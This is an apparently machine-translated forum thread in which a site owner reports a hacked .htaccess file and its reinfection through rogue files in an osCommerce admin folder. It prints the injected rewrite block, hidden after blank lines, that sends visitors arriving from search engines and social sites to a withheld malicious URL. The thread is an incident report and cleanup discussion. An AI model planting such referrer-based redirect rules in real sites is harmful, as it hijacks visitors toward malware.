大约 4 或 5 天前,一个客户回复我说他们的网站被从谷歌、雅虎等重定向到其他一些可疑的网站,但是当用户在浏览器地址中输入网站 URL 时它工作正常直接酒吧。
我尝试联系我的托管服务提供商,但他们一开始几乎没有帮助,然后似乎需要很长时间才能找出问题所在。
等待让我感到沮丧,我开始寻找发生了什么。在谷歌上搜索了一些解决方案后,我发现我的 .htaccess 文件被黑了。
什么是:
<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
已经变成
<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
//several hundred empty lines later
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ /*don't want to post the malicious URL here for fear of retaliation */[R=301,L]
基本上,攻击我的机器人似乎在写指示,将来自重要站点的所有流量重定向到病毒站点。
我立即通过删除令人反感的代码来修复它,并且对我聪明的自己感觉非常好。我还从公共访问的主文件夹中删除了 .htaccess 文件,并将其保留在上面的一个文件夹中,位于根目录下。我还将权限更改为 444,仅供任何人阅读。我更改了 FTP 访问、主机控制面板、MySQL 数据库等的密码。
然而,今天这个问题又回来了。结果发现我的 public_html 文件夹中安装了一个新的 .htaccess 文件,其中只有我上面写的令人反感的代码,没有别的。
这是怎么回事?
我有一种感觉,这不是我的密码被泄露的情况。我在共享主机上,也许同一个硬盘上的某个人写了一段代码,可以愉快地向所有邻居编写 .htaccess 文件。这可能吗?我能做些什么来确保这种情况不再发生?
但是,我无法重新安装主机的主操作系统或对其进行任何操作...
您的网站已被黑客入侵。您需要擦除它并从已知的良好备份中恢复。保留一份被黑网站及其日志的副本,以便您可以将其与好的网站进行比较,并尝试找出该网站是如何被入侵的。
好吧伙计们,我找到了蟑螂!
我做了所有事情,包括更改 FTP 密码、主机面板密码、(痛苦地)擦除整个 2GB 并通过将其全部上传备份以及更改数据库密码。
他们还是进去了。
FTP 日志只显示我自己的操作。最重要的是,.htaccess 文件的 last-modified-timestamp与我的时间戳完全相同(每当我从重复变态中纠正它时),因此无法知道修改何时以及如何发生。我猜他们正在使用filemtime()并touch()这样做。
好吧,事实证明胭脂文件是通过 osCommerce 安装进入的。我不知道如何,但具体来说,它通过管理区域。在管理文件夹中,有这些名为“google_analitis(sic)_somenumber”的外部文件。我在我的主要统计阅读器上注意到了它们。我刚刚查看了今天正在访问的所有文件(正常日志),幸运的是,该文件今天再次被黑客入侵,所以我怀疑有一个胭脂脚本,并且瞧瞧,这些文件得到了垃圾邮件发送者的臭味写在他们的文件名上。
我打开它们,果然,它们做了很多恶作剧。
我刚刚使用 URL 打开了一个文件,我真的很惊讶这些文件提供的控制量......它是整个网站的一个翻转的并行控制面板!
希望这对某人有所帮助...查看您的第三方应用程序,尤其是当您看到大量未知机器人在您的网站上爬行时。
| 归档时间: |
|
| 查看次数: |
6601 次 |
| 最近记录: |